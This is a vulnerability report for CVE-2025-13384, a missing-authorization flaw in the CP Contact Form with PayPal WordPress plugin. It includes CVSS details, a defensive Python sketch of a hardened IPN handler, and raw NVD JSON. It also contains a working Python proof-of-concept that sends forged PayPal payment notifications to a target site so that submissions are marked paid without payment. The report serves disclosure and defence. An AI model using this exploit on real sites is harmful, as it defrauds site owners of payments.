Security Vulnerability Report
CVE-2025-13384 CVSS 7.5 HIGH

CVE-2025-13384

Published: 2025-11-22 08:15:45
Last Modified: 2026-04-15 00:35:42

Description

The CP Contact Form with PayPal plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.56. The plugin exposes an unauthenticated IPN-like endpoint (selected via the 'cp_contactformpp_ipncheck' query parameter) that processes payment confirmations without any authentication, nonce verification, or PayPal IPN validation (no postback to PayPal to confirm the message originated there). As a result, an unauthenticated attacker can mark form submissions as paid without making a payment by sending a forged payment notification with arbitrary POST data (payment_status, txn_id, payer_email). Integrity is the only impact: no data is disclosed and availability is unaffected, which is why the CVSS vector below scores C:N/I:H/A:N.

Weakness: CWE-862 (Missing Authorization).

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No CPE configuration data is present in the NVD record; the affected range below is taken from the description.

CP Contact Form with PayPal plugin for WordPress <= 1.3.56 (all versions up to and including 1.3.56)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import sys

import requests

# CVE-2025-13384 PoC - Missing Authorization in CP Contact Form with PayPal
# Target: WordPress site with CP Contact Form with PayPal plugin <= 1.3.56


def exploit_cve_2025_13384(target_url, form_id='1'):
    """
    Exploit for CVE-2025-13384

    This PoC demonstrates how an unauthenticated attacker can forge payment
    notifications to mark form submissions as paid without actual payment.
    """
    # Construct the vulnerable endpoint (strip a trailing slash so the
    # query string is not appended after "//")
    endpoint = (f"{target_url.rstrip('/')}/"
                f"?cp_contactformpp_ipncheck=1&cp_contactformpostid={form_id}")

    # Forge payment notification data. The endpoint never posts the message
    # back to PayPal, so none of these fields are validated.
    payload = {
        'payment_status': 'Completed',
        'txn_id': 'FAKE_TXN_' + str(hash(str(target_url)))[:10],
        'payer_email': '[email protected]',  # placeholder value as published
        'mc_gross': '99.00',
        'mc_currency': 'USD',
        'item_name': 'Form Submission Payment',
        'custom': form_id,
    }

    print(f"[*] Target: {target_url}")
    print("[*] Exploiting CVE-2025-13384...")
    print(f"[*] Sending forged payment notification to: {endpoint}")

    try:
        response = requests.post(endpoint, data=payload, timeout=10)
        print(f"[+] Request sent. Status code: {response.status_code}")
        # A 200 only shows the endpoint accepted the request; confirm the
        # submission's payment state in the WordPress admin to be sure.
        if response.status_code == 200:
            print("[!] Payment notification processed - form may be marked as paid")
        return response
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return None


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [form_id]")
        sys.exit(1)
    target = sys.argv[1]
    form_id = sys.argv[2] if len(sys.argv) > 2 else '1'
    exploit_cve_2025_13384(target, form_id)
```
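The description and the PoC above show the root cause from the attacker's side: the endpoint flips a submission to "paid" on the strength of client-supplied POST fields. The following Python sketch is an added example, not code from the plugin (which is PHP) or from this report. It places that trusting pattern next to an IPN handler that does what PayPal's IPN protocol requires (echo the message back with cmd=_notify-validate prepended and accept only a VERIFIED answer) and then checks receiver, status, amount, currency and txn_id replay against server-side records. The submission store, the merchant settings, and the injected postback stub that stands in for the HTTPS call to PayPal are my assumptions so that the example runs offline.

```python
"""
Added illustration for CVE-2025-13384 (not the plugin's code).
Assumptions (mine): submissions live in a dict keyed by the PayPal 'custom'
field; the PayPal postback is an injected callable so this runs offline.
"""
from typing import Callable, Dict, Set
from urllib.parse import urlencode

# Constructed merchant settings (not from the advisory).
MERCHANT_EMAIL = "merchant@example.com"
MERCHANT_CURRENCY = "USD"


def new_store() -> Dict[str, dict]:
    """Constructed sample: one form submission awaiting a 99.00 USD payment."""
    return {"1": {"amount": "99.00", "paid": False, "txn_id": None}}


def vulnerable_ipn_handler(store: Dict[str, dict], post: Dict[str, str]) -> str:
    """The pattern the advisory describes: no auth, no nonce, no PayPal
    postback. Whatever the client says in payment_status is believed."""
    sub = store.get(post.get("custom", ""))
    if sub is None:
        return "unknown submission"
    if post.get("payment_status") == "Completed":
        sub["paid"] = True
        sub["txn_id"] = post.get("txn_id")
        return "marked paid"
    return "ignored"


def hardened_ipn_handler(store: Dict[str, dict], post: Dict[str, str],
                         postback: Callable[[str], str], seen_txn: Set[str]) -> str:
    """IPN handling as PayPal documents it, plus the checks that matter."""
    # Real code posts this body to https://ipnpb.paypal.com/cgi-bin/webscr and
    # trusts the message only if PayPal answers VERIFIED; 'postback' stands in
    # for that HTTPS call here.
    if postback("cmd=_notify-validate&" + urlencode(post)) != "VERIFIED":
        return "rejected: PayPal did not verify the message"
    sub = store.get(post.get("custom", ""))
    if sub is None:
        return "rejected: unknown submission"
    # Anyone can pay into *some* PayPal account; it has to be ours.
    if post.get("receiver_email", "").lower() != MERCHANT_EMAIL.lower():
        return "rejected: wrong receiver"
    if post.get("payment_status") != "Completed":
        return "ignored: status is not Completed"
    # Expected amount and currency come from our own record, never from the message.
    if post.get("mc_gross") != sub["amount"] or post.get("mc_currency") != MERCHANT_CURRENCY:
        return "rejected: amount/currency mismatch"
    txn = post.get("txn_id", "")
    if not txn or txn in seen_txn:
        return "rejected: missing or replayed txn_id"
    seen_txn.add(txn)
    sub["paid"] = True
    sub["txn_id"] = txn
    return "marked paid"


# Constructed forged notification, the shape the PoC above sends.
FORGED = {
    "payment_status": "Completed", "txn_id": "FAKE_TXN_123",
    "payer_email": "attacker@example.com", "receiver_email": MERCHANT_EMAIL,
    "mc_gross": "99.00", "mc_currency": "USD", "custom": "1",
}


def paypal_stub_never_sent(_body: str) -> str:
    """Stands in for PayPal when it never issued the message."""
    return "INVALID"


def paypal_stub_genuine(body: str) -> str:
    """Stands in for PayPal for a message it did issue (real txn_id)."""
    return "VERIFIED" if "txn_id=REAL_TXN_1" in body else "INVALID"


def demo() -> dict:
    """Forged message through both handlers, then a genuine one twice (replay)."""
    vuln_store, hard_store, seen = new_store(), new_store(), set()
    results = {
        "vulnerable_forged": vulnerable_ipn_handler(vuln_store, FORGED),
        "hardened_forged": hardened_ipn_handler(hard_store, FORGED, paypal_stub_never_sent, seen),
    }
    results["hardened_forged_paid"] = hard_store["1"]["paid"]
    genuine = dict(FORGED, txn_id="REAL_TXN_1", payer_email="buyer@example.com")
    results["hardened_genuine"] = hardened_ipn_handler(hard_store, genuine, paypal_stub_genuine, seen)
    results["hardened_replay"] = hardened_ipn_handler(hard_store, genuine, paypal_stub_genuine, seen)
    results["vulnerable_paid"] = vuln_store["1"]["paid"]
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The postback is the check the advisory says is missing; the remaining checks matter because even a genuine PayPal message can name a different receiver, a smaller amount, or be replayed. Note that the body echoed to PayPal must be the exact fields received, which is why the handler forwards the parsed POST unchanged.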

References

- https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L541
- https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L877
- https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L925
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399104%40cp-contact-form-with-paypal&new=3399104%40cp-contact-form-with-paypal&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/6639c3d8-8f26-4ee5-8c4b-2efcf34668a2?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-13384",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-22T08:15:44.647",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The CP Contact Form with PayPal plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.56. This is due to the plugin exposing an unauthenticated IPN-like endpoint (via the 'cp_contactformpp_ipncheck' query parameter) that processes payment confirmations without any authentication, nonce verification, or PayPal IPN signature validation. This makes it possible for unauthenticated attackers to mark form submissions as paid without making actual payments by sending forged payment notification requests with arbitrary POST data (payment_status, txn_id, payer_email)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L541",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L877",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/cp-contact-form-with-paypal/tags/1.3.56/cp_contactformpp_functions.php#L925",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399104%40cp-contact-form-with-paypal&new=3399104%40cp-contact-form-with-paypal&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6639c3d8-8f26-4ee5-8c4b-2efcf34668a2?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```